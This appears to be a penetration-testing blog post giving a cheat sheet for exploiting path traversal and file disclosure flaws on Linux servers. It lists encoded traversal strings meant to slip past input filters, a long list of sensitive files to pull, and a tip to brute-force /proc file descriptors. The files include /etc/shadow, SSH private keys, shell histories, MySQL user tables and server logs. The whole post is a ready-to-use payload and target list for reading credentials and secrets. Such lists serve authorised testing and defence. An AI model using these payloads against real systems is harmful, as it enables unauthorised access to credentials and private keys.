Path Traversal Cheat Sheet: Linux

Got a path/directory traversal or file disclosure vulnerability on a Linux-server and need to know some interesting files to hunt for? I’ve got you covered Know any more good files to look for? Let me know!

The list included below contains absolute file paths, remember if you have a traversal attack you can prefix these with encoding traversal strings, like these:

../ 
..\ 
..\/ 
%2e%2e%2f 
%252e%252e%252f 
%c0%ae%c0%ae%c0%af 
%uff0e%uff0e%u2215 
%uff0e%uff0e%u2216 
..././ 
...\.\

File Disclosure Cheat Sheet

/etc/passwd 
/etc/shadow 
/etc/aliases 
/etc/anacrontab 
/etc/apache2/apache2.conf 
/etc/apache2/httpd.conf 
/etc/at.allow 
/etc/at.deny 
/etc/bashrc 
/etc/bootptab 
/etc/chrootUsers 
/etc/chttp.conf 
/etc/cron.allow 
/etc/cron.deny 
/etc/crontab 
/etc/cups/cupsd.conf 
/etc/exports 
/etc/fstab 
/etc/ftpaccess 
/etc/ftpchroot 
/etc/ftphosts 
/etc/groups 
/etc/grub.conf 
/etc/hosts 
/etc/hosts.allow 
/etc/hosts.deny 
/etc/httpd/access.conf 
/etc/httpd/conf/httpd.conf 
/etc/httpd/httpd.conf 
/etc/httpd/logs/access_log 
/etc/httpd/logs/access.log 
/etc/httpd/logs/error_log 
/etc/httpd/logs/error.log 
/etc/httpd/php.ini 
/etc/httpd/srm.conf 
/etc/inetd.conf 
/etc/inittab 
/etc/issue 
/etc/lighttpd.conf 
/etc/lilo.conf 
/etc/logrotate.d/ftp 
/etc/logrotate.d/proftpd 
/etc/logrotate.d/vsftpd.log 
/etc/lsb-release 
/etc/motd 
/etc/modules.conf 
/etc/motd 
/etc/mtab 
/etc/my.cnf 
/etc/my.conf 
/etc/mysql/my.cnf 
/etc/network/interfaces 
/etc/networks 
/etc/npasswd 
/etc/passwd 
/etc/php4.4/fcgi/php.ini 
/etc/php4/apache2/php.ini
/etc/php4/apache/php.ini 
/etc/php4/cgi/php.ini 
/etc/php4/apache2/php.ini 
/etc/php5/apache2/php.ini 
/etc/php5/apache/php.ini 
/etc/php/apache2/php.ini 
/etc/php/apache/php.ini 
/etc/php/cgi/php.ini 
/etc/php.ini 
/etc/php/php4/php.ini 
/etc/php/php.ini 
/etc/printcap 
/etc/profile 
/etc/proftp.conf 
/etc/proftpd/proftpd.conf 
/etc/pure-ftpd.conf 
/etc/pureftpd.passwd 
/etc/pureftpd.pdb 
/etc/pure-ftpd/pure-ftpd.conf 
/etc/pure-ftpd/pure-ftpd.pdb 
/etc/pure-ftpd/putreftpd.pdb 
/etc/redhat-release 
/etc/resolv.conf 
/etc/samba/smb.conf 
/etc/snmpd.conf 
/etc/ssh/ssh_config
/etc/ssh/sshd_config 
/etc/ssh/ssh_host_dsa_key 
/etc/ssh/ssh_host_dsa_key.pub 
/etc/ssh/ssh_host_key 
/etc/ssh/ssh_host_key.pub 
/etc/sysconfig/network 
/etc/syslog.conf 
/etc/termcap 
/etc/vhcs2/proftpd/proftpd.conf 
/etc/vsftpd.chroot_list 
/etc/vsftpd.conf 
/etc/vsftpd/vsftpd.conf 
/etc/wu-ftpd/ftpaccess 
/etc/wu-ftpd/ftphosts 
/etc/wu-ftpd/ftpusers 
/logs/pure-ftpd.log 
/logs/security_debug_log 
/logs/security_log 
/opt/lampp/etc/httpd.conf 
/opt/xampp/etc/php.ini 
/proc/cpuinfo 
/proc/filesystems 
/proc/interrupts 
/proc/ioports 
/proc/meminfo 
/proc/modules 
/proc/mounts 
/proc/stat 
/proc/swaps 
/proc/version 
/proc/self/net/arp 
/root/anaconda-ks.cfg 
/usr/etc/pure-ftpd.conf 
/usr/lib/php.ini 
/usr/lib/php/php.ini 
/usr/local/apache/conf/modsec.conf 
/usr/local/apache/conf/php.ini 
/usr/local/apache/log 
/usr/local/apache/logs 
/usr/local/apache/logs/access_log 
/usr/local/apache/logs/access.log 
/usr/local/apache/audit_log 
/usr/local/apache/error_log 
/usr/local/apache/error.log 
/usr/local/cpanel/logs 
/usr/local/cpanel/logs/access_log 
/usr/local/cpanel/logs/error_log 
/usr/local/cpanel/logs/license_log 
/usr/local/cpanel/logs/login_log 
/usr/local/cpanel/logs/stats_log 
/usr/local/etc/httpd/logs/access_log 
/usr/local/etc/httpd/logs/error_log 
/usr/local/etc/php.ini 
/usr/local/etc/pure-ftpd.conf 
/usr/local/etc/pureftpd.pdb 
/usr/local/lib/php.ini 
/usr/local/php4/httpd.conf 
/usr/local/php4/httpd.conf.php 
/usr/local/php4/lib/php.ini 
/usr/local/php5/httpd.conf 
/usr/local/php5/httpd.conf.php 
/usr/local/php5/lib/php.ini 
/usr/local/php/httpd.conf 
/usr/local/php/httpd.conf.ini 
/usr/local/php/lib/php.ini 
/usr/local/pureftpd/etc/pure-ftpd.conf 
/usr/local/pureftpd/etc/pureftpd.pdn 
/usr/local/pureftpd/sbin/pure-config.pl 
/usr/local/www/logs/httpd_log 
/usr/local/Zend/etc/php.ini 
/usr/sbin/pure-config.pl 
/var/adm/log/xferlog /var/apache2/config.inc 
/var/apache/logs/access_log 
/var/apache/logs/error_log 
/var/cpanel/cpanel.config 
/var/lib/mysql/my.cnf 
/var/lib/mysql/mysql/user.MYD 
/var/local/www/conf/php.ini 
/var/log/apache2/access_log 
/var/log/apache2/access.log 
/var/log/apache2/error_log 
/var/log/apache2/error.log 
/var/log/apache/access_log 
/var/log/apache/access.log 
/var/log/apache/error_log 
/var/log/apache/error.log 
/var/log/apache-ssl/access.log 
/var/log/apache-ssl/error.log 
/var/log/auth.log 
/var/log/boot 
/var/htmp 
/var/log/chttp.log 
/var/log/cups/error.log 
/var/log/daemon.log 
/var/log/debug 
/var/log/dmesg 
/var/log/dpkg.log 
/var/log/exim_mainlog 
/var/log/exim/mainlog 
/var/log/exim_paniclog 
/var/log/exim.paniclog 
/var/log/exim_rejectlog 
/var/log/exim/rejectlog 
/var/log/faillog 
/var/log/ftplog 
/var/log/ftp-proxy 
/var/log/ftp-proxy/ftp-proxy.log 
/var/log/httpd/access_log 
/var/log/httpd/access.log 
/var/log/httpd/error_log 
/var/log/httpd/error.log 
/var/log/httpsd/ssl.access_log 
/var/log/httpsd/ssl_log 
/var/log/kern.log 
/var/log/lastlog 
/var/log/lighttpd/access.log 
/var/log/lighttpd/error.log 
/var/log/lighttpd/lighttpd.access.log 
/var/log/lighttpd/lighttpd.error.log 
/var/log/mail.info /var/log/mail.log 
/var/log/maillog /var/log/mail.warn 
/var/log/message /var/log/messages 
/var/log/mysqlderror.log 
/var/log/mysql.log 
/var/log/mysql/mysql-bin.log 
/var/log/mysql/mysql.log 
/var/log/mysql/mysql-slow.log 
/var/log/proftpd /var/log/pureftpd.log 
/var/log/pure-ftpd/pure-ftpd.log 
/var/log/secure 
/var/log/vsftpd.log 
/var/log/wtmp 
/var/log/xferlog 
/var/log/yum.log 
/var/mysql.log 
/var/run/utmp 
/var/spool/cron/crontabs/root 
/var/webmin/miniserv.log 
/var/www/log/access_log 
/var/www/log/error_log 
/var/www/logs/access_log 
/var/www/logs/error_log 
/var/www/logs/access.log 
/var/www/logs/error.log 
~/.atfp_history 
~/.bash_history 
~/.bash_logout 
~/.bash_profile 
~/.bashrc 
~/.gtkrc 
~/.login 
~/.logout 
~/.mysql_history 
~/.nano_history 
~/.php_history 
~/.profile 
~/.ssh/authorized_keys 
~/.ssh/id_dsa 
~/.ssh/id_dsa.pub 
~/.ssh/id_rsa 
~/.ssh/id_rsa.pub 
~/.ssh/identity 
~/.ssh/identity.pub 
~/.viminfo 
~/.wm_style 
~/.Xdefaults 
~/.xinitrc 
~/.Xresources 
~/.xsession

Oh, and one last thing, take a look at this path on a Linux box:

/proc/<int>/fd/<int> 
e.g. 
/proc/2116/fd/11

You might have to brute-force the integers a little, but it might just reveal some interesting information about running processes!